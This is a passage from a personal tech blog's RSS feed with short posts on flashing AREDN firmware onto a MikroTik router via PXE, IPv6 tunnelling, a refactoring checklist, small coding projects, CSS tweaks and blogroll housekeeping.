  825. <li>Connect a Ethernet dongle and configure it with this static IP: 192.168.1.10/24</li>
  826. <li>Run dnsmasq as a PXE server listening on the network interface of the Ethernet dongle: <pre>ifconfig en6 # use to check that IP is configured
  827. sudo dnsmasq -i en6 -u $(whoami) --log-dhcp --bootp-dynamic --dhcp-range=192.168.1.100,192.168.1.200 -d -p0 -K --dhcp-boot=rb.elf --enable-tftp --tftp-root=$(pwd)/tftp-root/</pre></li>
  828. <li>Power off the hAP ac lite and connect the Ethernet dongle to port 1 (<strong>PXE booting only seems to work on this port!</strong>)</li>
  829. <li>Press the reset button on the hAP ac lite, power it on and keep the button pressed for about 20 seconds (there is some output of dnsmask once the PXE booting is in progress)</li>
  830. <li>Wait until the hAP ac lite stops blinking and the LEDs are steady again (it also issues a new DHCP request via port1, but this time no PXE booting).</li>
  831. <li>Move the cable to port 2 (the AREDN default config for the MikroTik hAP ac lite uses port 1 for the Internet uplink, and port 2 for the 'inside' local network).</li>
  832. <li>Test that you can ping the inside IP of the AREDN node: <pre>ping 192.168.1.1</pre></li>
  833. <li>Open the admin page on <code>http://192.168.1.1/cgi-bin/admin</code> (Username is <code>root</code> and password is <code>hsmm</code>).</li>
  834. <li>In the Firmware Update section, click on 'Upload Firmware' and select the previously downloaded sysupgrade.bin file.</li>
  835. <li>Wait until a reboot has happened twice (it takes a couple minutes!) to complete the installation.</li>
  836. <li>Open <code>http://192.168.1.1</code> &ndash; congratulations, you now have a freshly installed (and not yet configured) AREDN node :-)</li>
  837. </ol>
  838. ]]></description>
  839.    <content:encoded><![CDATA[<p>At the recent <a href="http://hb9tf.ch" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> AGM fellow radio amateur <a href="https://medium.com/@hb9gvm" title="Martin Suess (HB9GVM)">HB9GVM</a> gave an introductory presentation about <a href="https://www.arednmesh.org/" title="Amateur Radio Emergency Data Network">AREDN</a>.</p>
  840. <p>Motivated by this, I ordered a <a href="https://mikrotik.com/product/RB952Ui-5ac2nD" title="MikroTik hAP ac lite">MikroTik hAP ac lite</a> and installed the AREDN firmware on it.<br>The following are my notes of the installation process.</p>
  841. <ol>
  842. <li>Download the firmware images for the MikroTik hAP ac lite from <a href="http://downloads.arednmesh.org/afs/www/" title="AREDN Firmware Selector">http://downloads.arednmesh.org/afs/www/</a> (both the *kernel.bin and *sysupgrade.bin are needed)</li>
  843. <li>Install <a href="https://thekelleys.org.uk/dnsmasq/doc.html" title="Dnsmasq - network services for small networks">Dnsmasq</a> as a PXE server on Mac OS: <pre>brew install dnsmasq</pre></li>
  844. <li>Setup the *kernel.bin for PXE: <pre>mkdir tftp-root
  845. cp $HOME/Downloads/aredn-3.23.12.0-ath79-mikrotik-mikrotik_routerboard-952ui-5ac2nd-initramfs-kernel.bin tftp-root/rb.elf</pre></li>
  846. <li>Connect a Ethernet dongle and configure it with this static IP: 192.168.1.10/24</li>
  847. <li>Run dnsmasq as a PXE server listening on the network interface of the Ethernet dongle: <pre>ifconfig en6 # use to check that IP is configured
  848. sudo dnsmasq -i en6 -u $(whoami) --log-dhcp --bootp-dynamic --dhcp-range=192.168.1.100,192.168.1.200 -d -p0 -K --dhcp-boot=rb.elf --enable-tftp --tftp-root=$(pwd)/tftp-root/</pre></li>
  849. <li>Power off the hAP ac lite and connect the Ethernet dongle to port 1 (<strong>PXE booting only seems to work on this port!</strong>)</li>
  850. <li>Press the reset button on the hAP ac lite, power it on and keep the button pressed for about 20 seconds (there is some output of dnsmask once the PXE booting is in progress)</li>
  851. <li>Wait until the hAP ac lite stops blinking and the LEDs are steady again (it also issues a new DHCP request via port1, but this time no PXE booting).</li>
  852. <li>Move the cable to port 2 (the AREDN default config for the MikroTik hAP ac lite uses port 1 for the Internet uplink, and port 2 for the 'inside' local network).</li>
  853. <li>Test that you can ping the inside IP of the AREDN node: <pre>ping 192.168.1.1</pre></li>
  854. <li>Open the admin page on <code>http://192.168.1.1/cgi-bin/admin</code> (Username is <code>root</code> and password is <code>hsmm</code>).</li>
  855. <li>In the Firmware Update section, click on 'Upload Firmware' and select the previously downloaded sysupgrade.bin file.</li>
  856. <li>Wait until a reboot has happened twice (it takes a couple minutes!) to complete the installation.</li>
  857. <li>Open <code>http://192.168.1.1</code> &ndash; congratulations, you now have a freshly installed (and not yet configured) AREDN node :-)</li>
  858. </ol>
  859. ]]></content:encoded>
  860.  </item>
  861.  
  862.  <item>
  863.    <title>Fifty Things you can do with a Software Defined Radio 📻</title>
  864.    <link>https://blog.x-way.org/Radio/2024/03/17/Fifty-Things-you-can-do-with-a-Software-Defined-Radio.html</link>
  865.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324339</guid>
  866.    <dc:creator>Andreas Jaggi</dc:creator>
  867.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  868.    <pubDate>Sun, 17 Mar 2024 09:50:00 +0000</pubDate>
  869.    <category domain="https://blog.x-way.org/Radio">Radio</category>
  870.    <description><![CDATA[<p><a href="https://blinry.org/50-things-with-sdr/" title="Fifty Things you can do with a Software Defined Radio">Fifty Things you can do with a Software Defined Radio 📻</a> &mdash; some cool SDR things to do (have done already some of them and more with my <a href="http://hb9tf.ch" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> friends :-)</p>
  871. <p>(<a href="https://news.ycombinator.com/item?id=39728153" title="Fifty Things you can do with a Software Defined Radio | Hacker News">via</a>)</p>
  872. <p>Also using this post to introduce a new category: <b><a href="https://blog.x-way.org/Radio/" title="x-log - Radio">Radio</a></b><br>
  873. Which will serve as a container for radio/HAM/Wireless related content.</p>
  874. ]]></description>
  875.    <content:encoded><![CDATA[<p><a href="https://blinry.org/50-things-with-sdr/" title="Fifty Things you can do with a Software Defined Radio">Fifty Things you can do with a Software Defined Radio 📻</a> &mdash; some cool SDR things to do (have done already some of them and more with my <a href="http://hb9tf.ch" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> friends :-)</p>
  876. <p>(<a href="https://news.ycombinator.com/item?id=39728153" title="Fifty Things you can do with a Software Defined Radio | Hacker News">via</a>)</p>
  877. <p>Also using this post to introduce a new category: <b><a href="https://blog.x-way.org/Radio/" title="x-log - Radio">Radio</a></b><br>
  878. Which will serve as a container for radio/HAM/Wireless related content.</p>
  879. ]]></content:encoded>
  880.  </item>
  881.  
  882.  <item>
  883.    <title>100 things you can do on your personal website</title>
  884.    <link>https://blog.x-way.org/Misc/2024/03/07/100-things-you-can-do-on-your-personal-website.html</link>
  885.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324338</guid>
  886.    <dc:creator>Andreas Jaggi</dc:creator>
  887.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  888.    <pubDate>Thu, 07 Mar 2024 23:56:00 +0000</pubDate>
  889.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  890.    <description><![CDATA[<p><a href="https://jamesg.blog/2024/02/19/personal-website-ideas/" title="100 things you can do on your personal website | James' Coffee Blog">100 things you can do on your personal website</a> &mdash; lots of ideas/inspirations also for this blog :-)</p>
  891. <p>(<a href="https://gigold.me/blog/100-dinge" title="">via</a>)</p>
  892. ]]></description>
  893.    <content:encoded><![CDATA[<p><a href="https://jamesg.blog/2024/02/19/personal-website-ideas/" title="100 things you can do on your personal website | James' Coffee Blog">100 things you can do on your personal website</a> &mdash; lots of ideas/inspirations also for this blog :-)</p>
  894. <p>(<a href="https://gigold.me/blog/100-dinge" title="">via</a>)</p>
  895. ]]></content:encoded>
  896.  </item>
  897.  
  898.  <item>
  899.    <title>Tunnelbroker to the rescue</title>
  900.    <link>https://blog.x-way.org/Networking/2024/02/25/Tunnelbroker-to-the-rescue.html</link>
  901.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324337</guid>
  902.    <dc:creator>Andreas Jaggi</dc:creator>
  903.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  904.    <pubDate>Sun, 25 Feb 2024 15:25:00 +0000</pubDate>
  905.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  906.    <description><![CDATA[<p>After nicely delivering <a href="https://blog.x-way.org/Networking/2021/02/04/Embracing-the-future-with-SolNet.html" title="x-log - Embracing the future with Solnet">native IPv6 connectivity for 3 years</a>, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.<br>Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket&hellip;).</p>
  907. <p>Thus change of plans, <a href="https://tunnelbroker.net/" title="Hurricane Electric Free IPv6 Tunnel Broker">tunnelbroker.net</a> (Hurricane Electric) to the rescue.<br>Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the <a href="https://en.wikipedia.org/wiki/6in4" title="6in4 - Wikipedia">6in4</a> encapsulation).</p>
  908. <p>Guess I'll have to look for a different Internet provider again.<br>Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(</p>
  909. ]]></description>
  910.    <content:encoded><![CDATA[<p>After nicely delivering <a href="https://blog.x-way.org/Networking/2021/02/04/Embracing-the-future-with-SolNet.html" title="x-log - Embracing the future with Solnet">native IPv6 connectivity for 3 years</a>, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.<br>Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket&hellip;).</p>
  911. <p>Thus change of plans, <a href="https://tunnelbroker.net/" title="Hurricane Electric Free IPv6 Tunnel Broker">tunnelbroker.net</a> (Hurricane Electric) to the rescue.<br>Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the <a href="https://en.wikipedia.org/wiki/6in4" title="6in4 - Wikipedia">6in4</a> encapsulation).</p>
  912. <p>Guess I'll have to look for a different Internet provider again.<br>Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(</p>
  913. ]]></content:encoded>
  914.  </item>
  915.  
  916.  <item>
  917.    <title>The High-Risk Refactoring</title>
  918.    <link>https://blog.x-way.org/Coding/2024/02/25/The-High-Risk-Refactoring.html</link>
  919.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324336</guid>
  920.    <dc:creator>Andreas Jaggi</dc:creator>
  921.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  922.    <pubDate>Sun, 25 Feb 2024 04:02:00 +0000</pubDate>
  923.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  924.    <description><![CDATA[<p>In the <a href="https://webup.org/blog/the-high-risk-refactoring/" title="The High-Risk Refactoring - Miroslav Nikolov">The High-Risk Refactoring</a> article there is this concise <em>Addressing Risk</em> checklist to keep in mind when refactoring.<br>During past refactorings (also low-risk ones) I often used almost the same guidelines to help me and can only recommend you to do the same:</p>
  925. <blockquote cite="https://webup.org/blog/the-high-risk-refactoring/">
  926. <p>✅ Define constraints. <em>How far should I go</em>. <br>
  927. ✅ Isolate improvements from features. <em>Do not apply them simultaneously</em>. <br>
  928. ✅ Write extensive tests. <em>Higher level (integration) with fewer implementation details. They should run alongside changes</em>. <br>
  929. ✅ Have a visual confirmation. <em>Open the browser</em>.</p>
  930. <p>❌ Do not skip tests. <em>Don't be lazy</em>.<br>
  931. ❌ Do not rely too much on code reviews and QA. <em>Humans make mistakes</em>.<br>
  932. ❌ Do not mix expensive cleanups with other changes. <em>But do that for small improvements</em>.</p>
  933. </blockquote>
  934. <p>(<a href="https://labnotes.org/weekend-reading-places-where-ive-lost-my-glasses/" title="Weekend Reading - Places where I've lost my glasses - Labnotes (by Assaf Arkin)">via</a>)</p>
  935. ]]></description>
  936.    <content:encoded><![CDATA[<p>In the <a href="https://webup.org/blog/the-high-risk-refactoring/" title="The High-Risk Refactoring - Miroslav Nikolov">The High-Risk Refactoring</a> article there is this concise <em>Addressing Risk</em> checklist to keep in mind when refactoring.<br>During past refactorings (also low-risk ones) I often used almost the same guidelines to help me and can only recommend you to do the same:</p>
  937. <blockquote cite="https://webup.org/blog/the-high-risk-refactoring/">
  938. <p>✅ Define constraints. <em>How far should I go</em>. <br>
  939. ✅ Isolate improvements from features. <em>Do not apply them simultaneously</em>. <br>
  940. ✅ Write extensive tests. <em>Higher level (integration) with fewer implementation details. They should run alongside changes</em>. <br>
  941. ✅ Have a visual confirmation. <em>Open the browser</em>.</p>
  942. <p>❌ Do not skip tests. <em>Don't be lazy</em>.<br>
  943. ❌ Do not rely too much on code reviews and QA. <em>Humans make mistakes</em>.<br>
  944. ❌ Do not mix expensive cleanups with other changes. <em>But do that for small improvements</em>.</p>
  945. </blockquote>
  946. <p>(<a href="https://labnotes.org/weekend-reading-places-where-ive-lost-my-glasses/" title="Weekend Reading - Places where I've lost my glasses - Labnotes (by Assaf Arkin)">via</a>)</p>
  947. ]]></content:encoded>
  948.  </item>
  949.  
  950.  <item>
  951.    <title>Please Blog</title>
  952.    <link>https://blog.x-way.org/Misc/2024/02/25/Please-Blog.html</link>
  953.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324335</guid>
  954.    <dc:creator>Andreas Jaggi</dc:creator>
  955.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  956.    <pubDate>Sun, 25 Feb 2024 03:17:00 +0000</pubDate>
  957.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  958.    <description><![CDATA[<p><a href="https://ultreia.me/blog/please-blog/" title="ultreia.me - PLEASE Blog">Please Blog</a> &mdash; <em>a plea for less Big Web and more Small Web</em> and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).</p>
  959. <blockquote cite="https://ultreia.me/blog/please-blog/"><p>Don’t wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.</p></blockquote>
  960. <p>(discovered via <a href="https://gigold.me/blog/links-links-links" title="Links, Links, Links | Thomas Gigold - Blog">Thomas Gigold</a>)</p>
  961. ]]></description>
  962.    <content:encoded><![CDATA[<p><a href="https://ultreia.me/blog/please-blog/" title="ultreia.me - PLEASE Blog">Please Blog</a> &mdash; <em>a plea for less Big Web and more Small Web</em> and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).</p>
  963. <blockquote cite="https://ultreia.me/blog/please-blog/"><p>Don’t wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.</p></blockquote>
  964. <p>(discovered via <a href="https://gigold.me/blog/links-links-links" title="Links, Links, Links | Thomas Gigold - Blog">Thomas Gigold</a>)</p>
  965. ]]></content:encoded>
  966.  </item>
  967.  
  968.  <item>
  969.    <title>ads.txt</title>
  970.    <link>https://blog.x-way.org/Webdesign/2024/02/18/ads-txt.html</link>
  971.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324334</guid>
  972.    <dc:creator>Andreas Jaggi</dc:creator>
  973.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  974.    <pubDate>Sun, 18 Feb 2024 17:38:00 +0000</pubDate>
  975.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  976.    <description><![CDATA[<p>Added and <a href="https://iabtechlab.com/ads.txt/" title="IAB Tech Lab - Ads.txt - Authorized Digital Sellers">ads.txt</a> file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.</p>
  977. <p>As I don't use any advertisment here the content of the file is pretty basic:</p>
  978. <pre>contact=https://blog.x-way.org/about.html</pre>
  979. ]]></description>
  980.    <content:encoded><![CDATA[<p>Added and <a href="https://iabtechlab.com/ads.txt/" title="IAB Tech Lab - Ads.txt - Authorized Digital Sellers">ads.txt</a> file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.</p>
  981. <p>As I don't use any advertisment here the content of the file is pretty basic:</p>
  982. <pre>contact=https://blog.x-way.org/about.html</pre>
  983. ]]></content:encoded>
  984.  </item>
  985.  
  986.  <item>
  987.    <title>ldapauth</title>
  988.    <link>https://blog.x-way.org/Linux/2024/02/18/ldapauth.html</link>
  989.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324333</guid>
  990.    <dc:creator>Andreas Jaggi</dc:creator>
  991.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  992.    <pubDate>Sun, 18 Feb 2024 15:37:00 +0000</pubDate>
  993.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  994.    <description><![CDATA[<p><a href="https://github.com/x-way/ldapauth" title="x-way/ldapauth">ldapauth</a> is a <a href="https://nodejs.org" title="Node.js">Node.js</a> script which I have been using for the last 12+ years mostly unchanged.</p>
  995. <p>It started its life in a <a href="https://en.wikipedia.org/wiki/LXC" title="Linux Containers (LXC)">LXC</a> container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.</p>
  996. <p>The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.<br>
  997. It talks <a href="https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol" title="Lightweight Directory Access Protocol - Wikipedia">LDAP</a> one one side (although limited to handle user lookup requests) and on the other side connects to a <a href="https://www.mongodb.com/" title="MongoDB - Document Oriented Database">MongoDB</a> database where the information is stored.</p>
  998. <p>It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).<br>
  999. Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.</p>
  1000. <p>Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like <a href="https://en.wikipedia.org/wiki/RADIUS" title="Remote Authentication Dial-In User Service">RADIUS</a>.<br>
  1001. A <a href="https://freeradius.org/" title="FreeRADIUS">freeradius</a> server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in <a href="https://github.com/x-way/ldapauth" title="x-way/ldapauth">ldapauth</a>, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)</p>
  1002. <p>Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).<br>
  1003. Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.</p>
  1004. ]]></description>
  1005.    <content:encoded><![CDATA[<p><a href="https://github.com/x-way/ldapauth" title="x-way/ldapauth">ldapauth</a> is a <a href="https://nodejs.org" title="Node.js">Node.js</a> script which I have been using for the last 12+ years mostly unchanged.</p>
  1006. <p>It started its life in a <a href="https://en.wikipedia.org/wiki/LXC" title="Linux Containers (LXC)">LXC</a> container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.</p>
  1007. <p>The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.<br>
  1008. It talks <a href="https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol" title="Lightweight Directory Access Protocol - Wikipedia">LDAP</a> one one side (although limited to handle user lookup requests) and on the other side connects to a <a href="https://www.mongodb.com/" title="MongoDB - Document Oriented Database">MongoDB</a> database where the information is stored.</p>
  1009. <p>It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).<br>
  1010. Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.</p>
  1011. <p>Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like <a href="https://en.wikipedia.org/wiki/RADIUS" title="Remote Authentication Dial-In User Service">RADIUS</a>.<br>
  1012. A <a href="https://freeradius.org/" title="FreeRADIUS">freeradius</a> server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in <a href="https://github.com/x-way/ldapauth" title="x-way/ldapauth">ldapauth</a>, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)</p>
  1013. <p>Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).<br>
  1014. Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.</p>
  1015. ]]></content:encoded>
  1016.  </item>
  1017.  
  1018.  <item>
  1019.    <title>Hilltop Hoods - Laced Up</title>
  1020.    <link>https://blog.x-way.org/Music/2024/02/18/Hilltop-Hoods-Laced-Up.html</link>
  1021.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324332</guid>
  1022.    <dc:creator>Andreas Jaggi</dc:creator>
  1023.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1024.    <pubDate>Sun, 18 Feb 2024 08:31:00 +0000</pubDate>
  1025.    <category domain="https://blog.x-way.org/Music">Music</category>
  1026.    <description><![CDATA[<p><a href="https://youtu.be/Nn-kfXCQt6A" title="Hilltop Hoods - Laced Up - YouTube">Hilltop Hoods - Laced Up</a></p>
  1027. <p>Some vibes from Australia &#x2764;</p>
  1028. ]]></description>
  1029.    <content:encoded><![CDATA[<p><a href="https://youtu.be/Nn-kfXCQt6A" title="Hilltop Hoods - Laced Up - YouTube">Hilltop Hoods - Laced Up</a></p>
  1030. <p>Some vibes from Australia &#x2764;</p>
  1031. ]]></content:encoded>
  1032.  </item>
  1033.  
  1034.  <item>
  1035.    <title>qr-bag</title>
  1036.    <link>https://blog.x-way.org/Coding/2024/02/03/qr-bag.html</link>
  1037.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324331</guid>
  1038.    <dc:creator>Andreas Jaggi</dc:creator>
  1039.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1040.    <pubDate>Sat, 03 Feb 2024 19:55:00 +0000</pubDate>
  1041.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  1042.    <description><![CDATA[<p>Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.<br>Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.</p>
  1043. <p>Thus say hello to <a href="https://github.com/x-way/qr-bag" title="x-way/qr-bag: Generate a QR code with a lost bag logo in the middle pointing to a URL with information about the owner ">qr-bag</a>. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.<br>The code for it is mostly a wrapper around the <a href="https://github.com/yeqown/go-qrcode" title="yeqown/go-qrcode">go-qrcode</a> library which does all the heavy lifting.</p>
  1044. <img src="https://blog.x-way.org/images/qr-bag123.png" width="173" height="173" alt="Example QR code">
  1045. ]]></description>
  1046.    <content:encoded><![CDATA[<p>Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.<br>Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.</p>
  1047. <p>Thus say hello to <a href="https://github.com/x-way/qr-bag" title="x-way/qr-bag: Generate a QR code with a lost bag logo in the middle pointing to a URL with information about the owner ">qr-bag</a>. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.<br>The code for it is mostly a wrapper around the <a href="https://github.com/yeqown/go-qrcode" title="yeqown/go-qrcode">go-qrcode</a> library which does all the heavy lifting.</p>
  1048. <img src="https://blog.x-way.org/images/qr-bag123.png" width="173" height="173" alt="Example QR code">
  1049. ]]></content:encoded>
  1050.  </item>
  1051.  
  1052.  <item>
  1053.    <title>text-decoration-color</title>
  1054.    <link>https://blog.x-way.org/Webdesign/2024/02/03/text-decoration-color.html</link>
  1055.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324330</guid>
  1056.    <dc:creator>Andreas Jaggi</dc:creator>
  1057.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1058.    <pubDate>Sat, 03 Feb 2024 16:27:00 +0000</pubDate>
  1059.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1060.    <description><![CDATA[<p>Just discovered the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/text-decoration-color" title="text-decoration-color - CSS: Cascading Style Sheets | MDN"><code>text-decoration-color</code></a> CSS property and added it to the style on the blog:</p>
  1061. <pre>a:hover {color: #454545; text-decoration: underline; text-decoration-color: #26C4FF;}</pre>
  1062. <p>This causes that when you hover over a link in a post, the underline is not in the same boring gray as the text but lights up in a nice color :-)</p>
  1063. <p>(not to be confused with the hacky colored underlines in the righthand navigation bar, where I use a colored <code>border-bottom</code> to achieve a similar effect since 2002)</p>
  1064. ]]></description>
  1065.    <content:encoded><![CDATA[<p>Just discovered the <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/text-decoration-color" title="text-decoration-color - CSS: Cascading Style Sheets | MDN"><code>text-decoration-color</code></a> CSS property and added it to the style on the blog:</p>
  1066. <pre>a:hover {color: #454545; text-decoration: underline; text-decoration-color: #26C4FF;}</pre>
  1067. <p>This causes that when you hover over a link in a post, the underline is not in the same boring gray as the text but lights up in a nice color :-)</p>
  1068. <p>(not to be confused with the hacky colored underlines in the righthand navigation bar, where I use a colored <code>border-bottom</code> to achieve a similar effect since 2002)</p>
  1069. ]]></content:encoded>
  1070.  </item>
  1071.  
  1072.  <item>
  1073.    <title>Blogroll cleanup 2024</title>
  1074.    <link>https://blog.x-way.org/Misc/2024/01/31/Blogroll-cleanup-2024.html</link>
  1075.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324329</guid>
  1076.    <dc:creator>Andreas Jaggi</dc:creator>
  1077.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1078.    <pubDate>Wed, 31 Jan 2024 22:50:00 +0000</pubDate>
  1079.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1080.    <description><![CDATA[<p>It's time again to do some cleanup of my blogroll before the links start to turn into 404 errors :-)</p>
  1081. <p>Removed:</p>
  1082. <ul>
  1083. <li><a href="https://web.archive.org/web/20200301211123/http://strcat.de/blog/" title="Veni, Vidi, VISA">Veni, Vidi, VISA</a></li>
  1084. <li><a href="https://web.archive.org/web/20230724205656/https://gru.gq/" title="grugq's domain - Cyber is Deception">gru.gq</a></li>
  1085. <li><a href="http://www.brewdog.com/blog" title="BrewDog Craft Beer Blog">BrewDog</a></li>
  1086. <li><a href="https://mdlayher.com/blog/" title="Matt Layher">mdlayher.com</a></li>
  1087. <li><a href="https://blog.inliniac.net/" title="Inliniac | Everything inline.">Inliniac</a></li>
  1088. <li><a href="https://home.regit.org/" title="To Linux and beyond!">To Linux and beyond!</a></li>
  1089. <li><a href="http://lonesysadmin.net/" title="The Lone Sysadmin">The Lone Sysadmin</a></li>
  1090. <li><a href="https://eklitzke.org/" title="Evan Klitzke">eklitzke.org</a></li>
  1091. </ul>
  1092. ]]></description>
  1093.    <content:encoded><![CDATA[<p>It's time again to do some cleanup of my blogroll before the links start to turn into 404 errors :-)</p>
  1094. <p>Removed:</p>
  1095. <ul>
  1096. <li><a href="https://web.archive.org/web/20200301211123/http://strcat.de/blog/" title="Veni, Vidi, VISA">Veni, Vidi, VISA</a></li>
  1097. <li><a href="https://web.archive.org/web/20230724205656/https://gru.gq/" title="grugq's domain - Cyber is Deception">gru.gq</a></li>
  1098. <li><a href="http://www.brewdog.com/blog" title="BrewDog Craft Beer Blog">BrewDog</a></li>
  1099. <li><a href="https://mdlayher.com/blog/" title="Matt Layher">mdlayher.com</a></li>
  1100. <li><a href="https://blog.inliniac.net/" title="Inliniac | Everything inline.">Inliniac</a></li>
  1101. <li><a href="https://home.regit.org/" title="To Linux and beyond!">To Linux and beyond!</a></li>
  1102. <li><a href="http://lonesysadmin.net/" title="The Lone Sysadmin">The Lone Sysadmin</a></li>
  1103. <li><a href="https://eklitzke.org/" title="Evan Klitzke">eklitzke.org</a></li>
  1104. </ul>
  1105. ]]></content:encoded>
  1106.  </item>
  1107.  
  1108.  <item>
  1109.    <title>Statistics revived</title>
  1110.    <link>https://blog.x-way.org/Misc/2024/01/30/Statistics-revived.html</link>
  1111.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324328</guid>
  1112.    <dc:creator>Andreas Jaggi</dc:creator>
  1113.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1114.    <pubDate>Tue, 30 Jan 2024 06:46:00 +0000</pubDate>
  1115.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1116.    <description><![CDATA[<p>Following in the trend of replacing tables, I've revived the old <a href="https://blog.x-way.org/statistics.html" title="x-log - Statistics">statistics page</a>.<br>Now using less markup as it is built with <code>&lt;div&gt;</code> and CSS only (the <code>display: inline-block;</code> property was particularly helpful).</p>
  1117. <p>(the Jekyll/Liquid templating to generate the data for it looks quite horrific though&hellip;)</p>
  1118. ]]></description>
  1119.    <content:encoded><![CDATA[<p>Following in the trend of replacing tables, I've revived the old <a href="https://blog.x-way.org/statistics.html" title="x-log - Statistics">statistics page</a>.<br>Now using less markup as it is built with <code>&lt;div&gt;</code> and CSS only (the <code>display: inline-block;</code> property was particularly helpful).</p>
  1120. <p>(the Jekyll/Liquid templating to generate the data for it looks quite horrific though&hellip;)</p>
  1121. ]]></content:encoded>
  1122.  </item>
  1123.  
  1124.  <item>
  1125.    <title>Tables are gone</title>
